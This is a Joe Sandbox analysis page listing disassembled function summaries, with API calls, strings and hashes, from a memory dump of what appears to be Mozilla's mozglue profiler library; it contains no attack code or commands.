Associated: 0000000A.00000002.3466903193.000000006C2F2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c260000_build_2024-07-25_20-56.jbxd

Similarity

API ID: memcpy$moz_xmalloc$_invalid_parameter_noinfo_noreturnfree
String ID:
API String ID: 1148890222-0
Opcode ID: 9eb239dadf0ed7a25305517bd9cbf03381796d2b97977e86556ea9335eaab6b3
Instruction ID: 4be871ce17ea19ca56599b44bd51f3043093f82c185ef7de66ab314215b45631
Opcode Fuzzy Hash: 9eb239dadf0ed7a25305517bd9cbf03381796d2b97977e86556ea9335eaab6b3
Instruction Fuzzy Hash: E641D6B1A002099FCB08CF68DC819AF7769AF94314B240228EC15D7794EB31E955C7F1

Function 6C2DB540 Relevance: 12.1, APIs: 8, Instructions: 93COMMON

Download Yara Rule

APIs

?classic@locale@std@@SAABV12@XZ.MSVCP140 ref: 6C2DB5B9
??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000), ref: 6C2DB5C5
??Bid@locale@std@@QAEIXZ.MSVCP140 ref: 6C2DB5DA
??1_Lockit@std@@QAE@XZ.MSVCP140(00000000), ref: 6C2DB5F4
__Init_thread_footer.LIBCMT ref: 6C2DB605
?_Getcat@?$ctype@D@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP140(00000000,?,00000000), ref: 6C2DB61F
std::_Facet_Register.LIBCPMT ref: 6C2DB631
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C2DB655

Memory Dump Source

Source File: 0000000A.00000002.3456274721.000000006C261000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C260000, based on PE: true

Associated: 0000000A.00000002.3454561964.000000006C260000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3461746311.000000006C2DD000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3464557798.000000006C2EE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3466903193.000000006C2F2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c260000_build_2024-07-25_20-56.jbxd

Similarity

API ID: Lockit@std@@$??0_??1_?classic@locale@std@@Bid@locale@std@@D@std@@Facet_Getcat@?$ctype@Init_thread_footerRegisterV12@V42@@Vfacet@locale@2@abortstd::_
String ID:
API String ID: 1276798925-0
Opcode ID: aa1324cb51891cc470407be3a6acb31f22b3d18bce8537172f755c5c5acd1bd8
Instruction ID: d212f2281257d1222eeca9c6768a067954ae0b9e94fff76147693d9b4643a152
Opcode Fuzzy Hash: aa1324cb51891cc470407be3a6acb31f22b3d18bce8537172f755c5c5acd1bd8
Instruction Fuzzy Hash: 5231A475B00209CBCF40DF69D85C9AEBBB5EB9E325B150529ED02A77C0DB30A806CB91

Function 6C2A6590 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 342COMMON

Download Yara Rule

APIs

Part of subcall function 6C29FA80: GetCurrentThreadId.KERNEL32 ref: 6C29FA8D
Part of subcall function 6C29FA80: AcquireSRWLockExclusive.KERNEL32(6C2EF448), ref: 6C29FA99

ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C2A6727
?GetOrAddIndex@UniqueJSONStrings@baseprofiler@mozilla@@AAEIABV?$Span@$$CBD$0PPPPPPPP@@3@@Z.MOZGLUE(?,?,?,?,?,?,?,00000001), ref: 6C2A67C8

Part of subcall function 6C2B4290: memcpy.VCRUNTIME140(?,?,6C2C2003,6C2C0AD9,?,6C2C0AD9,00000000,?,6C2C0AD9,?,00000004,?,6C2C1A62,?,6C2C2003,?), ref: 6C2B42C4

Strings

v.l, xrefs: 6C2A696C
data, xrefs: 6C2A6593

Memory Dump Source

Source File: 0000000A.00000002.3456274721.000000006C261000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C260000, based on PE: true

Associated: 0000000A.00000002.3454561964.000000006C260000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3461746311.000000006C2DD000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3464557798.000000006C2EE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3466903193.000000006C2F2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c260000_build_2024-07-25_20-56.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentIndex@P@@3@@ReleaseSpan@$$Strings@baseprofiler@mozilla@@ThreadUniquememcpy
String ID: data$v.l
API String ID: 511789754-495357292
Opcode ID: a053243d99b093cc6f6482cc5b492c67048c215e89989a2a43145b4f53cf6b79
Instruction ID: a724aac85cf1244ade3ff2566afa0fa7f9b744f2773ede2bfc407bfd76f160bc
Opcode Fuzzy Hash: a053243d99b093cc6f6482cc5b492c67048c215e89989a2a43145b4f53cf6b79
Instruction Fuzzy Hash: B7D1F375A043498FD724CF69C880B9FB7E5AFD5308F10892DE989D7B91DB30A849CB52

Function 6C29D5D0 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 279COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(00000001,?,?,?,?,6C26EB57,?,?,?,?,?,?,?,?,?), ref: 6C29D652
memset.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,?,6C26EB57,?), ref: 6C29D660
free.MOZGLUE(?,?,?,?,?,?,?,?,?,6C26EB57,?), ref: 6C29D673
free.MOZGLUE(?), ref: 6C29D888

Strings

W&l, xrefs: 6C29D5D9, 6C29D63F
|Enabled, xrefs: 6C29D81E

Memory Dump Source

Source File: 0000000A.00000002.3456274721.000000006C261000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C260000, based on PE: true

Associated: 0000000A.00000002.3454561964.000000006C260000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3461746311.000000006C2DD000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3464557798.000000006C2EE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3466903193.000000006C2F2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c260000_build_2024-07-25_20-56.jbxd

Similarity

API ID: free$memsetmoz_xmalloc
String ID: W&l$|Enabled
API String ID: 4142949111-1919668873
Opcode ID: 5c4e6d6e8465b754797e841ade158433a9ccfb6d4623d93c1a5e5e8297937125
Instruction ID: 07b8357df0a5ae855bf8475a4f46f78cfb758c1fda183ce0d61a38650dbbdf68
Opcode Fuzzy Hash: 5c4e6d6e8465b754797e841ade158433a9ccfb6d4623d93c1a5e5e8297937125
Instruction Fuzzy Hash: 54A1D5B0A003499FDB11CF6AC494BEEBBF1AF49318F14845CDC996B782D731A945CBA1

Function 6C279830 Relevance: 10.7, APIs: 7, Instructions: 196COMMON

Download Yara Rule

APIs

free.MOZGLUE(?,?,?,6C2C7ABE), ref: 6C27985B
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,6C2C7ABE), ref: 6C2798A8
moz_xmalloc.MOZGLUE(00000020), ref: 6C279909
memcpy.VCRUNTIME140(00000023,?,?), ref: 6C279918
free.MOZGLUE(?), ref: 6C279975

Memory Dump Source

Source File: 0000000A.00000002.3456274721.000000006C261000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C260000, based on PE: true

Associated: 0000000A.00000002.3454561964.000000006C260000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3461746311.000000006C2DD000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3464557798.000000006C2EE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3466903193.000000006C2F2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c260000_build_2024-07-25_20-56.jbxd

Similarity

API ID: free$_invalid_parameter_noinfo_noreturnmemcpymoz_xmalloc
String ID:
API String ID: 1281542009-0
Opcode ID: 8e927381984ac3937ff9ecc782769a5376bfb1d494e5c9dc36bd961bb9dabf06
Instruction ID: 7565456866092546a49f398a92e0da182dc9cb271faa103eb6d53d78443c8995
Opcode Fuzzy Hash: 8e927381984ac3937ff9ecc782769a5376bfb1d494e5c9dc36bd961bb9dabf06
Instruction Fuzzy Hash: BA71877460070ACFD725DF28C4C0956B7F5FF4A3247244AA9EC5A8BBA0D731B811CBA0

Function 6C27B790 Relevance: 10.6, APIs: 7, Instructions: 147COMMON

Download Yara Rule

APIs

?good@ios_base@std@@QBE_NXZ.MSVCP140(?,6C2BCC83,?,?,?,?,?,?,?,?,?,6C2BBCAE,?,?,6C2ADC2C), ref: 6C27B7E6
?good@ios_base@std@@QBE_NXZ.MSVCP140(?,6C2BCC83,?,?,?,?,?,?,?,?,?,6C2BBCAE,?,?,6C2ADC2C), ref: 6C27B80C
?clear@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z.MSVCP140(?,00000000,?,6C2BCC83,?,?,?,?,?,?,?,?,?,6C2BBCAE), ref: 6C27B88E
?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP140(?,6C2BCC83,?,?,?,?,?,?,?,?,?,6C2BBCAE,?,?,6C2ADC2C), ref: 6C27B896

Memory Dump Source

Source File: 0000000A.00000002.3456274721.000000006C261000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C260000, based on PE: true

Associated: 0000000A.00000002.3454561964.000000006C260000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3461746311.000000006C2DD000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3464557798.000000006C2EE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3466903193.000000006C2F2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c260000_build_2024-07-25_20-56.jbxd

Similarity

API ID: ?good@ios_base@std@@D@std@@@std@@U?$char_traits@$?clear@?$basic_ios@Osfx@?$basic_ostream@
String ID:
API String ID: 922945588-0
Opcode ID: 4a0ea4a75d25ac9d06fa25a0814e51e2ea7159aae609d7646ad3e63adb1c8df5
Instruction ID: 472a89e8e3e17687000cd8fbfd13bf08cb36e22bef141adbf62b5680acc9257d
Opcode Fuzzy Hash: 4a0ea4a75d25ac9d06fa25a0814e51e2ea7159aae609d7646ad3e63adb1c8df5
Instruction Fuzzy Hash: 085188357002098FCB25CF59C4C8E6ABBF1FF89319B69895DE99A97781C730E801CB94

Function 6C2B1D00 Relevance: 10.6, APIs: 7, Instructions: 115threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6C2B1D0F
AcquireSRWLockExclusive.KERNEL32(?,?,6C2B1BE3,?,?,6C2B1D96,00000000), ref: 6C2B1D18
ReleaseSRWLockExclusive.KERNEL32(?,?,6C2B1BE3,?,?,6C2B1D96,00000000), ref: 6C2B1D4C
GetCurrentThreadId.KERNEL32 ref: 6C2B1DB7
AcquireSRWLockExclusive.KERNEL32(?), ref: 6C2B1DC0
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C2B1DDA

Part of subcall function 6C2B1EF0: GetCurrentThreadId.KERNEL32 ref: 6C2B1F03
Part of subcall function 6C2B1EF0: AcquireSRWLockExclusive.KERNEL32(?,?,?,?,?,6C2B1DF2,00000000,00000000), ref: 6C2B1F0C
Part of subcall function 6C2B1EF0: ReleaseSRWLockExclusive.KERNEL32 ref: 6C2B1F20

moz_xmalloc.MOZGLUE(00000008,00000000,00000000), ref: 6C2B1DF4

Part of subcall function 6C27CA10: malloc.MOZGLUE(?), ref: 6C27CA26

Memory Dump Source

Source File: 0000000A.00000002.3456274721.000000006C261000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C260000, based on PE: true

Associated: 0000000A.00000002.3454561964.000000006C260000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3461746311.000000006C2DD000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3464557798.000000006C2EE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3466903193.000000006C2F2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c260000_build_2024-07-25_20-56.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThread$mallocmoz_xmalloc
String ID:
API String ID: 1880959753-0
Opcode ID: 245c0b57c8698f7fb3d01fa0fa4950976bb6375c76a7043ec16f5bba4d6a6f91
Instruction ID: 46ca0b14244a81804359a57e0ca7558bcc3b1e4ac559c792621bd01fc380c38c
Opcode Fuzzy Hash: 245c0b57c8698f7fb3d01fa0fa4950976bb6375c76a7043ec16f5bba4d6a6f91
Instruction Fuzzy Hash: BD4168B92007099FCB10CF29C489A56BBF9FB49758F10442DED5A97B81CB31F854CB94

Function 6C2738A0 Relevance: 10.6, APIs: 7, Instructions: 80memoryCOMMON

Download Yara Rule

APIs

AcquireSRWLockExclusive.KERNEL32(6C2EE220,?,?,?,?,6C273899,?), ref: 6C2738B2
ReleaseSRWLockExclusive.KERNEL32(6C2EE220,?,?,?,6C273899,?), ref: 6C2738C3
free.MOZGLUE(00000000,?,?,?,6C273899,?), ref: 6C2738F1
RtlFreeHeap.NTDLL(?,00000000,?), ref: 6C273920
RtlFreeUnicodeString.NTDLL(-0000000C,?,?,?,6C273899,?), ref: 6C27392F
RtlFreeUnicodeString.NTDLL(-00000014,?,?,?,6C273899,?), ref: 6C273943
RtlFreeHeap.NTDLL(?,00000000,0000002C), ref: 6C27396E

Memory Dump Source

Source File: 0000000A.00000002.3456274721.000000006C261000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C260000, based on PE: true

Associated: 0000000A.00000002.3454561964.000000006C260000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3461746311.000000006C2DD000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3464557798.000000006C2EE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3466903193.000000006C2F2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c260000_build_2024-07-25_20-56.jbxd

Similarity

API ID: Free$ExclusiveHeapLockStringUnicode$AcquireReleasefree
String ID:
API String ID: 3047341122-0
Opcode ID: 0bc996ae905a67f67e54c4789aed4873cc141ec452c7e8d922118bf8b0636ffd
Instruction ID: f474d64a08cf2bea651c59ace8338da324e8d2e6426355bfef2c0110e93ae846
Opcode Fuzzy Hash: 0bc996ae905a67f67e54c4789aed4873cc141ec452c7e8d922118bf8b0636ffd
Instruction Fuzzy Hash: BF210272600729DFD721DF19C884B86B7A9FF45728F168429ED5A97B50C730F845CBA0

Function 6C2A84E0 Relevance: 10.6, APIs: 7, Instructions: 79COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C2A84F3
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C2A850A
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C2A851E
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C2A855B
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C2A856F
??1UniqueJSONStrings@baseprofiler@mozilla@@QAE@XZ.MOZGLUE(?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C2A85AC

Part of subcall function 6C2A7670: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,6C2A85B1,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C2A767F
Part of subcall function 6C2A7670: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,6C2A85B1,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C2A7693
Part of subcall function 6C2A7670: free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,6C2A85B1,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C2A76A7

free.MOZGLUE(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C2A85B2

Part of subcall function 6C285E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C285EDB
Part of subcall function 6C285E90: memset.VCRUNTIME140(ew,l,000000E5,?), ref: 6C285F27
Part of subcall function 6C285E90: LeaveCriticalSection.KERNEL32(?), ref: 6C285FB2

Memory Dump Source

Source File: 0000000A.00000002.3456274721.000000006C261000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C260000, based on PE: true

Associated: 0000000A.00000002.3454561964.000000006C260000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3461746311.000000006C2DD000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3464557798.000000006C2EE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3466903193.000000006C2F2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c260000_build_2024-07-25_20-56.jbxd

Similarity

API ID: free$CriticalSection$EnterLeaveStrings@baseprofiler@mozilla@@Uniquememset
String ID:
API String ID: 2666944752-0
Opcode ID: 9d22e8a97c89f7bd3343cc81c38da06120eca4c74325720b386bcf6c1817b9c2
Instruction ID: 6da770fb7548a709fa3770db5104d975745b240232a7dec82129a2fee37ae9ba
Opcode Fuzzy Hash: 9d22e8a97c89f7bd3343cc81c38da06120eca4c74325720b386bcf6c1817b9c2
Instruction Fuzzy Hash: 99219F742007468FDB14DBA4C888A5AB7B5AF4470DF15082DED5B93B81DB31F949CB51

Function 6C271640 Relevance: 10.6, APIs: 7, Instructions: 77COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(?,00000000,00000114), ref: 6C271699
VerSetConditionMask.NTDLL ref: 6C2716CB
VerSetConditionMask.NTDLL ref: 6C2716D7
VerSetConditionMask.NTDLL ref: 6C2716DE
VerSetConditionMask.NTDLL ref: 6C2716E5
VerSetConditionMask.NTDLL ref: 6C2716EC
VerifyVersionInfoW.KERNEL32(?,00000037,00000000), ref: 6C2716F9

Memory Dump Source

Source File: 0000000A.00000002.3456274721.000000006C261000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C260000, based on PE: true

Associated: 0000000A.00000002.3454561964.000000006C260000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3461746311.000000006C2DD000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3464557798.000000006C2EE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3466903193.000000006C2F2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c260000_build_2024-07-25_20-56.jbxd

Similarity

API ID: ConditionMask$InfoVerifyVersionmemset
String ID:
API String ID: 375572348-0
Opcode ID: 3150853b95ead8ba5ce7383ae9e6cab31cd24d5042e957556b087a4a4ed5276e
Instruction ID: 7738e919d4bff88742a88c7273ef3351128b7ace6c8526a4dbc954cb170c72dd
Opcode Fuzzy Hash: 3150853b95ead8ba5ce7383ae9e6cab31cd24d5042e957556b087a4a4ed5276e
Instruction Fuzzy Hash: 2921A5B0B4020C6BEB215A659C89FBBB37CDFDA704F444528FA49AB5C0C6749D54CAA1

Function 6C2AF5B0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 70threadCOMMON

Download Yara Rule

APIs

Part of subcall function 6C29CBE8: GetCurrentProcess.KERNEL32(?,6C2631A7), ref: 6C29CBF1
Part of subcall function 6C29CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C2631A7), ref: 6C29CBFA

Part of subcall function 6C2A9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C274A68), ref: 6C2A945E
Part of subcall function 6C2A9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C2A9470
Part of subcall function 6C2A9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C2A9482
Part of subcall function 6C2A9420: __Init_thread_footer.LIBCMT ref: 6C2A949F

GetCurrentThreadId.KERNEL32 ref: 6C2AF619
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000,?,6C2AF598), ref: 6C2AF621

Part of subcall function 6C2A94D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C2A94EE
Part of subcall function 6C2A94D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C2A9508

GetCurrentThreadId.KERNEL32 ref: 6C2AF637
AcquireSRWLockExclusive.KERNEL32(6C2EF4B8,?,?,00000000,?,6C2AF598), ref: 6C2AF645
ReleaseSRWLockExclusive.KERNEL32(6C2EF4B8,?,?,00000000,?,6C2AF598), ref: 6C2AF663

Strings

[D %d/%d] profiler_remove_sampled_counter(%s), xrefs: 6C2AF62A

Memory Dump Source

Source File: 0000000A.00000002.3456274721.000000006C261000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C260000, based on PE: true

Associated: 0000000A.00000002.3454561964.000000006C260000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3461746311.000000006C2DD000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3464557798.000000006C2EE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3466903193.000000006C2F2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c260000_build_2024-07-25_20-56.jbxd

Similarity

API ID: Currentgetenv$ExclusiveLockProcessThread$AcquireInit_thread_footerReleaseTerminate__acrt_iob_func__stdio_common_vfprintf_getpid
String ID: [D %d/%d] profiler_remove_sampled_counter(%s)
API String ID: 1579816589-753366533
Opcode ID: 33aad1b35e88ad3142780cbacbbf2639e338799dd6a2984b5c198da4ecaf000a
Instruction ID: 0ceb5b98900fcd6df07fe479c41c9eada481e66832acf961614db2cdb7d6828c
Opcode Fuzzy Hash: 33aad1b35e88ad3142780cbacbbf2639e338799dd6a2984b5c198da4ecaf000a
Instruction Fuzzy Hash: B611EB76200309AFCB40AF59D44C9E6B779FB8E759B540015FE0593F41CB76A822CBA4

Function 6C272070 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 68libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 6C29AB89: EnterCriticalSection.KERNEL32(6C2EE370,?,?,?,6C2634DE,6C2EF6CC,?,?,?,?,?,?,?,6C263284), ref: 6C29AB94
Part of subcall function 6C29AB89: LeaveCriticalSection.KERNEL32(6C2EE370,?,6C2634DE,6C2EF6CC,?,?,?,?,?,?,?,6C263284,?,?,6C2856F6), ref: 6C29ABD1

LoadLibraryW.KERNEL32(combase.dll,6C271C5F), ref: 6C2720AE
GetProcAddress.KERNEL32(00000000,CoInitializeSecurity), ref: 6C2720CD
__Init_thread_footer.LIBCMT ref: 6C2720E1
FreeLibrary.KERNEL32 ref: 6C272124

Strings

CoInitializeSecurity, xrefs: 6C2720C7
combase.dll, xrefs: 6C2720A9

Memory Dump Source

Source File: 0000000A.00000002.3456274721.000000006C261000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C260000, based on PE: true

Associated: 0000000A.00000002.3454561964.000000006C260000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3461746311.000000006C2DD000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3464557798.000000006C2EE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3466903193.000000006C2F2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c260000_build_2024-07-25_20-56.jbxd

Similarity

API ID: CriticalLibrarySection$AddressEnterFreeInit_thread_footerLeaveLoadProc
String ID: CoInitializeSecurity$combase.dll
API String ID: 4190559335-2476802802
Opcode ID: 95e7bd007f8d5c32cf43e7e0db31dcb269dd7868cc6daa4687d4060bff121abe
Instruction ID: 1744fac47e9af0ab6f140761475c89e765a659fe734084260176ef49a8e20875
Opcode Fuzzy Hash: 95e7bd007f8d5c32cf43e7e0db31dcb269dd7868cc6daa4687d4060bff121abe
Instruction Fuzzy Hash: 5C215976601209EBDF219F59EC8CD9B3B76FB5E325F004028FE05A2690D7319861CFA0

Function 6C2C76C0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64COMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32 ref: 6C2C76F2
moz_xmalloc.MOZGLUE(00000001), ref: 6C2C7705

Part of subcall function 6C27CA10: malloc.MOZGLUE(?), ref: 6C27CA26

memset.VCRUNTIME140(00000000,00000000,00000001), ref: 6C2C7717
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,6C2C778F,00000000,00000000,00000000,00000000), ref: 6C2C7731
free.MOZGLUE(00000000), ref: 6C2C7760

Strings

}>*l, xrefs: 6C2C76C4

Memory Dump Source

Source File: 0000000A.00000002.3456274721.000000006C261000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C260000, based on PE: true

Associated: 0000000A.00000002.3454561964.000000006C260000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3461746311.000000006C2DD000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3464557798.000000006C2EE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3466903193.000000006C2F2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c260000_build_2024-07-25_20-56.jbxd

Similarity

API ID: ByteCharMultiWide$freemallocmemsetmoz_xmalloc
String ID: }>*l
API String ID: 2538299546-3180039836
Opcode ID: c3338c8ccbedf85774915fa7e0f5cb839349a1b82d13f58d01230868396d6e22
Instruction ID: f01224bcaaa7d5d59acc62cb7c81213ecbe60e8cc8d9e25992a20ad227079058
Opcode Fuzzy Hash: c3338c8ccbedf85774915fa7e0f5cb839349a1b82d13f58d01230868396d6e22
Instruction Fuzzy Hash: 3B1190B1E012196BE710AF768C44AABBEE8EF45654F144529FC48A7300E7709854CBE2

Function 6C2A99A0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 62threadCOMMON

Download Yara Rule

APIs

Part of subcall function 6C2A9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C274A68), ref: 6C2A945E
Part of subcall function 6C2A9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C2A9470
Part of subcall function 6C2A9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C2A9482
Part of subcall function 6C2A9420: __Init_thread_footer.LIBCMT ref: 6C2A949F

GetCurrentThreadId.KERNEL32 ref: 6C2A99C1
AcquireSRWLockExclusive.KERNEL32(6C2EF4B8), ref: 6C2A99CE
ReleaseSRWLockExclusive.KERNEL32(6C2EF4B8), ref: 6C2A99F8
GetCurrentThreadId.KERNEL32 ref: 6C2A9A05
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C2A9A0D

Part of subcall function 6C2A9A60: GetCurrentThreadId.KERNEL32 ref: 6C2A9A95
Part of subcall function 6C2A9A60: _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C2A9A9D
Part of subcall function 6C2A9A60: ?profiler_time@baseprofiler@mozilla@@YANXZ.MOZGLUE ref: 6C2A9ACC
Part of subcall function 6C2A9A60: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C2A9BA7
Part of subcall function 6C2A9A60: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000), ref: 6C2A9BB8
Part of subcall function 6C2A9A60: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000,00000000), ref: 6C2A9BC9

Part of subcall function 6C29CBE8: GetCurrentProcess.KERNEL32(?,6C2631A7), ref: 6C29CBF1
Part of subcall function 6C29CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C2631A7), ref: 6C29CBFA

Strings

[I %d/%d] profiler_stream_json_for_this_process, xrefs: 6C2A9A15

Memory Dump Source

Source File: 0000000A.00000002.3456274721.000000006C261000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C260000, based on PE: true

Associated: 0000000A.00000002.3454561964.000000006C260000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3461746311.000000006C2DD000.00000002.00000001.01000000.0000000C.sdmpDownload File
